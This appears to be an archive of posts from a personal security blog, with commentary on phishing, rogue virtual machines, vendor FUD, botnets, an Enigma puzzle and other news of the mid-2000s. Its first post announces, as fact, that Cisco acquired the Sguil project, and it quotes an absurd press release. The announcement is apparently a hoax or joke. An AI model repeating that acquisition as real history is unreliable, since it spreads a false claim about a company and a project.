I subscribe to the Info Security News RSS feed, which is a pretty nice way to keep up with various goings on in the industry.
This morning, the top headline was:
Many of you may have wondered why I haven't yet blogged about the recent release of Sguil 0.7.0. Did I forget? No. Am I disappointed with it? Not at all! Am I just lazy? Yes, but that's not why.
The truth is, I've held off blogging about that because there's some even bigger news with the Sguil project!
You probably didn't know this, as we've tried hard to keep it under wraps until it could be formally announced, but the Sguil project has just received an extremely large vote of confidence, in the form of it being acquired lock, stock and barrel by Cisco!
Yes, you read that right! From the press release:
Under terms of the transaction, Cisco has acquired the Sguil™ project and related trademarks, as well as the copyrights held by the five principal members of the Sguil™ team, including project founder Robert "Bamm" Visscher. Cisco will assume control of the open source Sguil™ project including the Sguil.net domain, web site and web site content and the Sguil™ Sourceforge project page. In addition, the Sguil™ team will remain dedicated to the project as Cisco employees, continuing their management of the project on a day-to-day basis.
Really, I didn't blog about Sguil 0.7.0 yet because I didn't want to do say anything that could have interfered with this deal.
The great thing about this is that both Cisco and Sguil have made significant investments in Tcl, as it's already found in the OS on many Cisco products. Of course, Sguil is written almost entirely in Tcl, so this should provide for some great synergy going forward. You should start seeing Sguil being pushed out into the carrier-grade Cisco gear by 3Q08, with the rest of the Cisco-branded products following in phases through 4Q09. Linksys-branded gear will be supported too, though there's not an official timetable for that yet.
On a personal note, I would like to congraluate Bamm (AKA "qru"), Sguil's lead developer. He's put a lot of time into this project over the years, and is finally going to reap some rewards:
Although the financial details of the agreement have not been announced, Sguil™ developer Robert Visscher will become the new VP of Cisco Rapid Analysis Products for Security. “This deal means a lot to the Sguil™ project and to me personally,” Visscher explains. “Previously, we had to be content with simply being the best technical solution to enable intrusion analysts to collect and analyze large amounts of data in an extraordinarily efficient manner. But now, we’ll have the additional advantage of the world’s largest manufacturer of networking gear shoving it down their customers’ throats! We will no longer have to concern ourselves with mere technical excellence. Instead, I can worry more about which tropical island to visit next, and which flavor daiquiri to order. You know, the important things.”
I know that many of you will have questions about this major evolution in the Sguil project and our continuing roles as Cisco employees, so please feel free to leave them here as comments, or ask in freenode IRC's #snort-gui channel.
This is the awesomest thing I've ever heard on the Internet. Some guy recorded a 10 minute phone call with a phisher. My favorites are the wife, the FBI and the 357.
This is SFW, though there are two or three things bleeped out.
So I open my inbox today and find an e-newsletter from Symantec. Normally, they barely register with me, and I just delete them an move on. This one though, had a great subject line:
After reading this, I may never be able to attend a certain security convention ever again.
Just a quick thought I had. If your organization is using virtualization to pack many VMs onto your existing server platforms (as many sites are trying to do these days), would you necessarily notice if an additional VM popped up?
It turns out that VMs can be very small (the smallest VMWare image I found with a quick google search was 10MB, which could fit in my /tmp partition). Many, perhaps all, of the VM packages provide command-line level access to manage the running guest systems. VMWare even provides a Perl API for this.
If I were an attacker who managed to get access to your VM system, could I insert my own VM image and make it run? If so, I could potentially have my own custom hacking environment, with root privileges and whatever software I needed, without creating too many files or new processes on the host OS. Unless you're looking carefully at every file on the system, or watching what VMs are running, would you notice?
Would anyone with real-world virtual server experience care to share their thoughts?
I highly recommend that you take a look at this. You just need to see it to believe it. I find their "network activity as videogame" metaphor oddly appealing. It's almost like it's translating your network activity into the story of an epic space battle. Since humans are conditioned by long experience to assimilate and relate well to stories, this could be quite an effective approach. Joseph Campbell as NSM analyst.
I'd really like to be able to run this against my own network to see how effective it would be in every day use. It's a bit hard to tell based on the clip they've put out.
I took some time off earlier this month to have a family vacation in London. Overall, it was pretty fun, but we wanted to get out of the city for a bit, so we took the train to Bletchley Park. BP is where the British government ran their super-secret cryptography operations against the German ciphers during WWII.
Of course, the most famous of these ciphers is the Enigma machine, of which there were actually several different types in use in the various branches of the German military. I don't want to bore you with all the details of Enigma, especially since they're probably familiar to many of you. What I wanted to tell you about was this fun toy I bought, the Pocket Enigma cipher machine.
Housed in CD jewel case and made entirely of paper, it emulates a simple one-rotor system (with a choice of two possible rotors). There's no plugboard or anything complex like that, so it's really easy to understand, and it's a lot of fun to send seekrit messages to your buddies, in a flashlight-under-the-covers kind of way.
Here's my contribution to the fun. See if you can decode the following message, enciphered on my very own Pocket Enigma. The first person to post a correct solution in the comments wins... umm... the people's ovation and fame forever!
II B
X VJFEI OJAXQ PBUXQ DTFVH GFAKQ UQGES IOGZW
Inspired in part by my earlier posting about The Hidden Dangers of Protocols, some of us on #snort-gui were playing with the idea of The Onion applied to security. Here are some of the headlines we came up with.
<Hanashi> "Area Man's Password Hacked After He Exchanges it for Chocolate Bar"
<Hanashi> "Commentary: I Totally Pwn!"
<Nigel_VRT> "Wireless: No Wires! What's up with that?"
<Nigel_VRT> "Undisclosed remote bug in software that some people use"
<Hanashi> "Study: Second graders way too amused by phrase 'IP'"
<helevius> "Jumbo Frames: Obese, or Just Big Boned?"
<Hanashi> "Covert Channel Discovered in IPv6: The Use of IPv6"
<Nigel_VRT> "If you don't use Microsoft Windows, you're an evil hacker. By Staff writer Will G. Ates"
What about you? Post your best funny headlines in the comments!
I got the following today, from a very reputable security vendor. I'm not going to name them, because I think they're otherwise pretty good, but this is really just pathetic:
The Hidden Dangers of Protocols
Protocols are the sets of rules governing the communications of network applications, such as instant messaging, peer-to-peer file sharing, and streaming media. But, protocols may allow these communications to transmit confidential information, spyware, keyloggers, worms, viruses, and other security threats into and out of your organization. Protocols may also allow users to access inappropriate applications. Plus, they may be consuming valuable network bandwidth and draining user productivity in the process!
Protocols are dangerous? I've got news for this writer: protocols put the "work" in "network". Without TCP/IP, odds are you don't have a network, and that's not counting the myriad other protocols above and below the IP level.
Clearly, the vendor (as a whole) understands the concept of protocols perfectly well. So I conclude that either they've hired an incompetent writer or editor in the marketing department, or they're taking the chance to do a little FUD-mongering. I'll be charitable and guess it's the former.
Seriously, this is the dumbest thing I've seen from a security company in quite a long time.
I read with interest Gadi Evron's recent post, mitigating botnet C&Cs has become useless (while you're at it, read Richard Bejtlich's response, too). Gadi Evron has probably forgotten, relearned and forgotten again more things about botnets than I will ever know, so when he speaks on the subject, I pay attention.
As with most security problems, the basic issue here is that competition drives innovation. Like biological evolution, the digitial evolutionary imperative mandates that as we improve our defensive techniques, the Bad Guys also improve their offense. With the transition from amateur malware writers to professional bad actors, the pace of this evolution has already and will continue to increase dramatically.
So what can we do? First, let me make the following assertion:
Ok, this is just dumb. According to this article, Richard Carrigan, a physicist at Fermilab, is concerned that aliens (as in E.T.) are going to "infect the Internet". He claims that the signals processed by the millions of computers participating in the SETI@Home distributed computing project are capable of carrying malicious code, and the SETI project should implement some sort of signal quarantine to protect us. Kind of like a reverse Jeff Goldblum manoeuver from Independence Day.
The thing is, this isn't a very likely scenario. First, the signals are data, and not executable code. That's our first layer of protection.
Now, we could posit a software flaw in the SETI@Home client that could lead to some sort of overflow that allowed arbitrary code to be executed, but in order for aliens to successfully exploit it, they'd need to know an awful lot about how our computers work, and about our current software versions, and the laws of physics are working against them.
The closest star is about 4.5 light years away from Earth. Assuming that we broadcast complete technical details of the x86 architecture and an entire copy of the Windows OS, along with a comprehensive set of security bulletins and an SDK, the necessary roundtrip time for data travelling at the speed of light would mean that by the time the "exploit" could arrive here, we'd be about 9 years further on. Let's see, 9 years ago, we'd all have been running NT 4 and Windows 95. Good luck trying a Win95 overflow on my XP system! The offsets are wrong now, and new security technologies exist now that weren't dreamed of then (like the non-executable stack). What will we have 9 years from now? I don't know (and neither do the aliens), but I do know the aliens don't stand a chance.
Seriously, I think he's missing the point. If you want to be concerned with the security of the SETI@Home software or their new replacement, BOINC, don't bring aliens into the picture. Security concerns are legitimate, yes, but it is far more likely that if a software bug does exist that allows remote code execution, it'll be exploited by a human, not an alien.
Unless, of course, you believe this guy.
Update 2005-11-28 09:48 -- Check out Richard Carrigan's website for more information on his idea. There's a presentation and a copy of his paper on the subject.
Ahoy, me harties! The underhanded C contest (or, to we pirates, "the underhanded sea contest". Arr!) trains a perspective glass squarely on fine, upstanding looking code with a scurrilous hidden purpose. The winners have just been announced. Check 'em out, or ye'll be forced to drink a bucket 'o bilge!
This is hillarious. People, if you go to a hacker conference, make sure you practice safe computing. I would have thought this was just common sense.
This is how you think about everything in your life if you're in the security field. Check out Bruce Schneier's analysis on Hacking the Papal Election.
ZDNet Australia is reporting that a University of California doctoral student has developed a technique for telling different computers apart over the network by detecting their clock skew. According to this article, the technique works behind NAT devices and over long periods of time, even if devices move around a lot.
I need to read the research paper in order to decide whether I believe this or not, but it sounds plausible. Unfortunately, the paper is not yet available.
UPDATE [2005-03-04 12:42]: The paper is indeed available, and can be found here.
I've commented on this story before, but SecurityFocus.com is reporting that Oxford University has suspended two students for "hacking" their network, then publishing the results in the school paper. The students claim they did it to point out the school's lousy security, but that's a weak excuse at best. They violated the policy without permission, and got busted. Score one for the Oxford IT department.
Yeah, ok, this isn't my usual fare on this blog, but I just finished watching my newly-acquired WarGames DVD. I'm astounded at how well this movie holds up two decades after it's original release. Soviet era FUD aside, you could almost shoot the same script today. The computers would be smaller (no 8" IMSAI floppy drives) but hacking really hasn't evolved as much as you might think. We still use war dialers to find rogue modem lines, and people still use weak, guessable passwords for important accounts.
Ok, I'm off the soapbox now. I love this movie...
Well known Russian anti-virus vendor Kaspersky Labs is feeding the FUD machine. Its head, Yevgeny Kaspersky, is quoted in this article about the coming cyber-jihad. Apparently, tomorrow (Thursday, August 26) there will be a "large scale virus attack" that "might be delivered by Islamic terrorists".
I don't know about you, but I go through every day thinking, "There might be a large-scale virus attack today." And a lot of the time, I'm right. Either I've somehow got a psychic connection with Islamic terrorists, or this isn't news because it happens all the time. You choose. Kaspersky, you are better than this.
Update 08/26/04: Although this story was widely reported, Kaspersky Labs says it was just a misunderstanding of what Mr. Kaspersky was actually saying. See this story for more details.
Ok, this is a little weird. Apparently, a National Science Foundation research station at the South Pole was hacked earlier this year. Although the NSF disputes the claim, US Attorney General John Ashcroft and the FBI have at various times claimed that the attack placed the lives of the scientists there at risk, because the life support system was compromised. That may or may not be true, but it's certainly a convenient excuse for them to tout the USA PATRIOT Act and how they say it saved 58 lives.
I have no way to verify the claims on either side, but if you're interested in more information, SecurityFocus.com has the scoop.
